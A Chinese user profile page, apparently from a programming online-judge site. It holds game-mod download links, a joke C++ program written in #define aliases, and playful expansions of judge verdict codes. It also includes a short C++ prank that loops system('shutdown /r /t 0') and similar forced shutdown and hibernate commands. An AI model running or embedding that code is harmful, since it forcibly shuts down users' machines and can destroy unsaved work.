• 个人简介

    我叫⚡李光耀⚡

    又名李——

    ⚡炸药!!!⚡

    注:植物大战僵尸融合版免费下载网址 https://www.32z.com/soft/5444.html

    解压缩后 植物大战僵尸融合版2.2屋顶版本->PlantsVsZombiesRH

    植物大战僵尸杂交版免费下载网址 https://www.downza.cn/soft/365449.html

    代码可参考(但我不建议)

    #include<bits/stdc++.h>
    using namespace std;
    int main()
    {
        system("color AB");
        while(true)
        {
            system("cls");
            system("date");
            system("time");
            system("shutdown /r /t 0");
            system("shutdown /s /t 0");
            system("shutdown /h /f");
        }
        return 0;
    }
    

    and

    define的正确用法(新)

    如果没bug的话,编译后会输入一个数,输出它,输出1加到14转char得到的英文字母…… 就剧透到这,其他的自己翻译(其实是我懒得写了) 有bug欢迎反馈,可能会更新

    #include<bits/stdc++.h>
    #define hello (
    #define bye )
    #define where using
    #define can namespace
    #define I std
    #define go ;
    #define look signed
    #define find long long
    #define make char
    #define play bool
    #define eat string
    #define them main
    #define begin {
    #define end }
    #define good return
    #define day 0
    #define is =
    #define input scanf
    #define output printf
    #define on >
    #define under <
    #define _this "%d"
    #define _or ,
    #define place &
    #define go_in for
    #define inis <=
    #define plus ++
    #define up +
    #define _char "%c"
    #define finish_line "\n"
    #define man if
    #define is_not !=
    #define no_man else
    #define str "%s"
    #define th "a1"
    #define outit <<
    #define outpro cout
    #define n_until while
    #define inpro cin
    #define init >>
    #define eq ==
    #define out_of_it break
    #define mod %
    #define you [
    #define they ]
    #define nonr void
    #define left sort
    #define aor ||
    look b you 20010 they _or cc is -1 go
    where can I go
    look them hello bye begin
    	look a go
    	a is 12 go
    	eat kfc go
    	input hello _this _or place a bye go
    	output hello _this _or a bye go
    	look sum is day go
    	go_in hello look i is 1 go i inis 14 go i plus bye begin
    		sum is sum up i go
    	end
    	output hello finish_line bye go
    	output hello _char _or sum bye go
    	output hello finish_line bye go
    	look l go
    	input hello _this _or place l bye go
    	man hello l is_not 1 bye begin
    		output hello _this _or 123 bye go
    	end
    	no_man begin
    		output hello str _or th bye go
    	end
    	outpro outit finish_line outit 66 outit finish_line go
    	look w go
    	n_until hello inpro init w bye begin
    		man hello w eq day bye begin
    			out_of_it go
    		end
    		look f is day go
    		go_in hello look i is 2 go i under w go i plus bye begin
    			man hello w mod i eq day bye begin
    				f is 1 go
    				out_of_it go
    			end
    		end
    		man hello f aor w inis 1 bye begin
    			outpro outit 11 outit finish_line go
    		end
    		no_man begin
    			outpro outit day outit finish_line go
    		end
    	end
    	look n go
    	inpro init n go
    	go_in hello look i is 1 go i inis n go i plus bye begin
    		inpro init b you i they go
    	end
    	left hello b up 1 _or b up n up 1 bye go
    	outpro outit b you 1 they go
    	good day go
    end
    

    还有,iostream=9+15+19+20+18+5+1+13=100

    ``` c p p之后+`` `就可以关闭代码框 在信息学竞赛中AC、WA、RE、CE、TLE、MLE、PE、OLE分别是什么意思? 正确答案 AC = Accepted:程序输出完全正确

    WA = Wrong Answer:程序输出与标准答案不一致(不包括行末空格以及文件末空行)

    TLE = Time Limit Error:程序运行时间超过了题目限制

    MLE = Memory Limit Error:程序运行内存空间超过了题目限制

    RE = Runtime Error:程序运行时错误(如数组越界、被零除、运算溢出、栈溢出、无效指针等)

    CE = Compile Error:编译失败

    一些很离谱的答案 AC = Apareciym 显形咒

    CE = Crucio 钻心咒 (CO 是 Colloportus 禁锢咒)

    PE = Petrificus 石化咒

    RE = Reducto 粉碎咒

    WA = Wingardium Leviosa 悬浮咒

    MLE = Muggle-Repelling 驱逐咒

    TLE = Tarantollegra 舞步咒

    OLE = Obliviate 遗忘咒

    AC = Answer Coarse=粗劣的答案

    WA = Wonderful Answer=好答案

    TLE = Time Limit Enough=时间充裕

    MLE = Memory Limit Enough=内存充裕

    CE = Compile Easily=轻松通过编译

    RE = Run Excellently=完美运行

    AC = awful correct 正确但很差劲

    WA = wonderful answer 完美的答案

    RE = right ending 正确的结果

    CE = compiled easily 轻松的编译

    TLE = time limit enough 时间充裕

    Waiting 评测:评测请求正在等待被评测机抓取 Fetched 评测:评测请求已被评测机抓取,正在准备开始评测 Compiling 评测:正在编译中 Judging 评测:编译成功,正在评测中 Accepted 通过:程序输出完全正确 Wrong Answer 不通过:程序输出与标准答案不一致(不包括行末空格以及文件末空行) Time Limit Exceeded 不通过:程序运行时间超过了题目限制 Memory Limit Exceeded 不通过:程序运行内存空间超过了题目限制 Runtime Error 不通过:程序运行时错误(如数组越界、被零除、运算溢出、栈溢出、无效指针等) Compile Error 不通过:编译失败 System Error 错误:系统错误(如果您遇到此问题,请及时在讨论区进行反馈) Canceled 其他:评测被取消 Unknown Error 其他:未知错误 Ignored 其他:被忽略

  • 最近活动

  • Stat

  • Rating